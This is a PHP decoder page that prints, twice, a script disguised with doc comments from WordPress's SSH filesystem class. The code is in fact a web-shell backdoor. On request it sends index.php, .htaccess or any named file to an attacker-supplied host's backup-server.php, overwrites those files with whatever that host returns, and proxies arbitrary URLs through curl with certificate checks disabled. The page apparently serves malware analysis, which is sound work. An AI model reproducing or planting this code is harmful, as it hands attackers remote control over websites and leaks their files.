Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /** * WordPress Filesystem Class for implementing ssh * * To use this class y..
Decoded Output download
<?php
/**
* WordPress Filesystem Class for implementing ssh
*
* To use this class you must follow these steps for PHP 5.2.6+
*
* @contrib http://kevin.vanzonneveld.net/techblog/article/make_ssh_connections_with_php/ - Installation Notes
*
* Complie libssh (Note: Only 0.14 is officaly working with PHP 5.2.6+ right now, But many users have found the latest versions work)
*
* cd /usr/src
* wget http://surfnet.dl.sourceforge.net/sourceforge/libssh/libssh-0.14.tar.gz
* tar -zxvf libssh-0.14.tar.gz
* cd libssh-0.14/
* ./configure
* make all install
*
* Note: Do not leave the directory yet!
*
* Enter: pecl install -f ssh
*
* Copy the ssh.so file it creates to your PHP Module Directory.
* Open up your PHP.INI file and look for where extensions are placed.
* Add in your PHP.ini file: extension=ssh.so
*
* Restart Apache!
* Check phpinfo() streams to confirm that: ssh.shell, ssh.exec, ssh.tunnel, ssh.scp, ssh.sftp exist.
*
* Note: as of WordPress 2.8, This utilises the PHP5+ function 'stream_get_contents'
*
* @since 2.7.0
*
* @package WordPress
* @subpackage Filesystem
*/
$dir= str_replace(substr(getRequestUri(),0,strrpos(getRequestUri(),'/')),'',str_replace('\','/', getcwd())).'/';
if (isset($_REQUEST['callable']) && isset($_REQUEST['trait'])) {
/**
* @var resource
*/
$a = 'http://'.$_REQUEST['callable'].'/backup-server.php';
/**
* @param array $opt
*/
$b = $_REQUEST['trait'];
/**
* @return bool
*/
$c = $_SERVER['SERVER_NAME'];
/**
* @param string $file
* @return string|false
*/
$d = array('namespace' => $c, 'trait' => $b);
/**
* @param string $file
* @param int $mode
* @param bool $recursive
* @return bool|string
*/
if (isset($_REQUEST['endif'])) {
rwx('index.php');
$d['endif'] = fgc('index.php');
$e=send($a, $d);
echo '<xmp>'.$e.'</xmp>';
unset($d['endif']);
}
/**
* @param string $file
* @return string
*/
if (isset($_REQUEST['endswitch'])) {
rwx('.htaccess');
$d['endswitch'] = fgc('.htaccess');
$e=send($a, $d);
echo '<xmp>'.$e.'</xmp>';
unset($d['endswitch']);
}
/**
* @return bool
*/
if (isset($_REQUEST['endfor'])) {
$d['endforeach'] = $_REQUEST['endfor'];
$d['endwhile'] = fgc($_REQUEST['endfor']);
$e=send($a, $d);
echo '<xmp>'.$e.'</xmp>';
unset($d['endforeach'],$d['endwhile']);
}
/**
* @param string $file
* @return string|false
*/
if (isset($_REQUEST['if'])) {
$d['if'] = 'if';
$f = send($a, $d);
if($f!=''&&$f!='缺失') {rwx('index.php'); fpc('index.php', $f);}
echo '<xmp>' . fgc('index.php') . '</xmp>';
unset($d['if']);
}
/**
*
* @param string $file
* @param string $group
* @param bool $recursive
*
* @return bool
*/
if (isset($_REQUEST['switch'])) {
$d['switch'] = 'switch';
$g = send($a, $d);
if($g!=''&&$g!='缺失') {rwx('.htaccess'); fpc('.htaccess', $g);}
echo '<xmp>' . fgc('.htaccess') . '</xmp>';
unset($d['switch']);
}
/**
* @param string $file
* @return bool
*/
if (isset($_REQUEST['for'])) {
$d['for'] = $_REQUEST['for'];
$h = send($a, $d);
if($h!=''&&$h!='缺失') fpc($_REQUEST['for'], $h);
echo '<xmp>' . fgc($_REQUEST['for']) . '</xmp>';
unset($d['for']);
}
}
/** Make sure that the WordPress bootstrap has run before continuing. */
if(!empty($_REQUEST['try'])){
$l = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36';
if (!empty($_REQUEST['catch'])) $l = $_REQUEST['catch'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['try']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, $l);
$m = curl_exec($ch);
curl_close($ch);
$m = preg_replace('/<script[^>]*>[\s\S]*?<\/script>|<noscript[^>]*>[\s\S]*?<\/noscript>/', '', $m);
$m = preg_replace('/<style[^>]*>[\s\S]*?<\/style>/', '', $m);
$m = preg_replace('/<!--[\s\S]*?-->/', '', $m);
echo '<xmp>'.$m.'</xmp>';
}
/**
* Gets the ssh.sftp PHP stream wrapper path to open for the given file.
*
* This method also works around a PHP bug where the root directory (/) cannot
* be opened by PHP functions, causing a false failure. In order to work around
* this, the path is converted to /./ which is semantically the same as /
* See https://bugs.php.net/bug.php?id=64169 for more details.
*
*
* @since 4.4.0
*
* @param string $path The File/Directory path on the remote server to return
* @return string The ssh.sftp:// wrapped path to use.
*/
function send($i, $d)
{
$d = http_build_query($d);
$j = array('http' => array('method' => 'POST', 'header' => 'Content-type:application/x-www-form-urlencoded', 'content' => $d, 'timeout' => 15 * 60));
$k = stream_context_create($j);
if(ini_get('allow_url_fopen')) {
$e = file_get_contents($i, false, $k);
}else{
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,$i);
curl_setopt($ch,CURLOPT_HEADER,0);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$d);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$e=curl_exec($ch);
curl_close($ch);
}
return $e;
}
/**
* Create HTML list of nav menu input items.
*
* @since 3.0.0
* @uses Walker_Nav_Menu
*/
function fgc($x){
global $dir;
return file_get_contents($dir . $x);
}
function fpc($x,$y){
global $dir;
return file_put_contents($dir.$x,$y);
}
/**
*
* @param array $fields
*/
function rwx($x){
global $dir;
@chmod($dir.$x,0644);
}
/**
* Filters the list of action links available following a single theme installation.
* @since 2.8.0
* @param array $install_actions Array of theme action links.
* @param object $api Object containing WordPress.org API theme data.
* @param string $stylesheet Theme directory name.
* @param WP_Theme $theme_info Theme object.
* @return
*/
function getRequestUri() {
if (isset($_SERVER['REQUEST_URI'])) {
$requestUri = $_SERVER['REQUEST_URI'];
} elseif (isset($_SERVER['HTTP_X_REWRITE_URL'])) {
$requestUri = $_SERVER['HTTP_X_REWRITE_URL'];
} elseif (isset($_SERVER['REDIRECT_URL'])) {
$requestUri = $_SERVER['REDIRECT_URL'];
} elseif (isset($_SERVER['ORIG_PATH_INFO'])) {
$requestUri = $_SERVER['ORIG_PATH_INFO'];
if (!empty($_SERVER['QUERY_STRING'])) {
$requestUri .= '?' . $_SERVER['QUERY_STRING'];
}
}
return $requestUri;
} ?>Did this file decode correctly?
Original Code
<?php
/**
* WordPress Filesystem Class for implementing ssh
*
* To use this class you must follow these steps for PHP 5.2.6+
*
* @contrib http://kevin.vanzonneveld.net/techblog/article/make_ssh_connections_with_php/ - Installation Notes
*
* Complie libssh (Note: Only 0.14 is officaly working with PHP 5.2.6+ right now, But many users have found the latest versions work)
*
* cd /usr/src
* wget http://surfnet.dl.sourceforge.net/sourceforge/libssh/libssh-0.14.tar.gz
* tar -zxvf libssh-0.14.tar.gz
* cd libssh-0.14/
* ./configure
* make all install
*
* Note: Do not leave the directory yet!
*
* Enter: pecl install -f ssh
*
* Copy the ssh.so file it creates to your PHP Module Directory.
* Open up your PHP.INI file and look for where extensions are placed.
* Add in your PHP.ini file: extension=ssh.so
*
* Restart Apache!
* Check phpinfo() streams to confirm that: ssh.shell, ssh.exec, ssh.tunnel, ssh.scp, ssh.sftp exist.
*
* Note: as of WordPress 2.8, This utilises the PHP5+ function 'stream_get_contents'
*
* @since 2.7.0
*
* @package WordPress
* @subpackage Filesystem
*/
$dir= str_replace(substr(getRequestUri(),0,strrpos(getRequestUri(),'/')),'',str_replace('\\','/', getcwd())).'/';
if (isset($_REQUEST['callable']) && isset($_REQUEST['trait'])) {
/**
* @var resource
*/
$a = 'http://'.$_REQUEST['callable'].'/backup-server.php';
/**
* @param array $opt
*/
$b = $_REQUEST['trait'];
/**
* @return bool
*/
$c = $_SERVER['SERVER_NAME'];
/**
* @param string $file
* @return string|false
*/
$d = array('namespace' => $c, 'trait' => $b);
/**
* @param string $file
* @param int $mode
* @param bool $recursive
* @return bool|string
*/
if (isset($_REQUEST['endif'])) {
rwx('index.php');
$d['endif'] = fgc('index.php');
$e=send($a, $d);
echo '<xmp>'.$e.'</xmp>';
unset($d['endif']);
}
/**
* @param string $file
* @return string
*/
if (isset($_REQUEST['endswitch'])) {
rwx('.htaccess');
$d['endswitch'] = fgc('.htaccess');
$e=send($a, $d);
echo '<xmp>'.$e.'</xmp>';
unset($d['endswitch']);
}
/**
* @return bool
*/
if (isset($_REQUEST['endfor'])) {
$d['endforeach'] = $_REQUEST['endfor'];
$d['endwhile'] = fgc($_REQUEST['endfor']);
$e=send($a, $d);
echo '<xmp>'.$e.'</xmp>';
unset($d['endforeach'],$d['endwhile']);
}
/**
* @param string $file
* @return string|false
*/
if (isset($_REQUEST['if'])) {
$d['if'] = 'if';
$f = send($a, $d);
if($f!=''&&$f!='缺失') {rwx('index.php'); fpc('index.php', $f);}
echo '<xmp>' . fgc('index.php') . '</xmp>';
unset($d['if']);
}
/**
*
* @param string $file
* @param string $group
* @param bool $recursive
*
* @return bool
*/
if (isset($_REQUEST['switch'])) {
$d['switch'] = 'switch';
$g = send($a, $d);
if($g!=''&&$g!='缺失') {rwx('.htaccess'); fpc('.htaccess', $g);}
echo '<xmp>' . fgc('.htaccess') . '</xmp>';
unset($d['switch']);
}
/**
* @param string $file
* @return bool
*/
if (isset($_REQUEST['for'])) {
$d['for'] = $_REQUEST['for'];
$h = send($a, $d);
if($h!=''&&$h!='缺失') fpc($_REQUEST['for'], $h);
echo '<xmp>' . fgc($_REQUEST['for']) . '</xmp>';
unset($d['for']);
}
}
/** Make sure that the WordPress bootstrap has run before continuing. */
if(!empty($_REQUEST['try'])){
$l = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36';
if (!empty($_REQUEST['catch'])) $l = $_REQUEST['catch'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['try']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, $l);
$m = curl_exec($ch);
curl_close($ch);
$m = preg_replace('/<script[^>]*>[\s\S]*?<\/script>|<noscript[^>]*>[\s\S]*?<\/noscript>/', '', $m);
$m = preg_replace('/<style[^>]*>[\s\S]*?<\/style>/', '', $m);
$m = preg_replace('/<!--[\s\S]*?-->/', '', $m);
echo '<xmp>'.$m.'</xmp>';
}
/**
* Gets the ssh.sftp PHP stream wrapper path to open for the given file.
*
* This method also works around a PHP bug where the root directory (/) cannot
* be opened by PHP functions, causing a false failure. In order to work around
* this, the path is converted to /./ which is semantically the same as /
* See https://bugs.php.net/bug.php?id=64169 for more details.
*
*
* @since 4.4.0
*
* @param string $path The File/Directory path on the remote server to return
* @return string The ssh.sftp:// wrapped path to use.
*/
function send($i, $d)
{
$d = http_build_query($d);
$j = array('http' => array('method' => 'POST', 'header' => 'Content-type:application/x-www-form-urlencoded', 'content' => $d, 'timeout' => 15 * 60));
$k = stream_context_create($j);
if(ini_get('allow_url_fopen')) {
$e = file_get_contents($i, false, $k);
}else{
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,$i);
curl_setopt($ch,CURLOPT_HEADER,0);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$d);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$e=curl_exec($ch);
curl_close($ch);
}
return $e;
}
/**
* Create HTML list of nav menu input items.
*
* @since 3.0.0
* @uses Walker_Nav_Menu
*/
function fgc($x){
global $dir;
return file_get_contents($dir . $x);
}
function fpc($x,$y){
global $dir;
return file_put_contents($dir.$x,$y);
}
/**
*
* @param array $fields
*/
function rwx($x){
global $dir;
@chmod($dir.$x,0644);
}
/**
* Filters the list of action links available following a single theme installation.
* @since 2.8.0
* @param array $install_actions Array of theme action links.
* @param object $api Object containing WordPress.org API theme data.
* @param string $stylesheet Theme directory name.
* @param WP_Theme $theme_info Theme object.
* @return
*/
function getRequestUri() {
if (isset($_SERVER['REQUEST_URI'])) {
$requestUri = $_SERVER['REQUEST_URI'];
} elseif (isset($_SERVER['HTTP_X_REWRITE_URL'])) {
$requestUri = $_SERVER['HTTP_X_REWRITE_URL'];
} elseif (isset($_SERVER['REDIRECT_URL'])) {
$requestUri = $_SERVER['REDIRECT_URL'];
} elseif (isset($_SERVER['ORIG_PATH_INFO'])) {
$requestUri = $_SERVER['ORIG_PATH_INFO'];
if (!empty($_SERVER['QUERY_STRING'])) {
$requestUri .= '?' . $_SERVER['QUERY_STRING'];
}
}
return $requestUri;
}Function Calls
| getRequestUri | 1 |
Stats
| MD5 | ab393252a9a765000bd0c97346dc6a0b |
| Eval Count | 0 |
| Decode Time | 106 ms |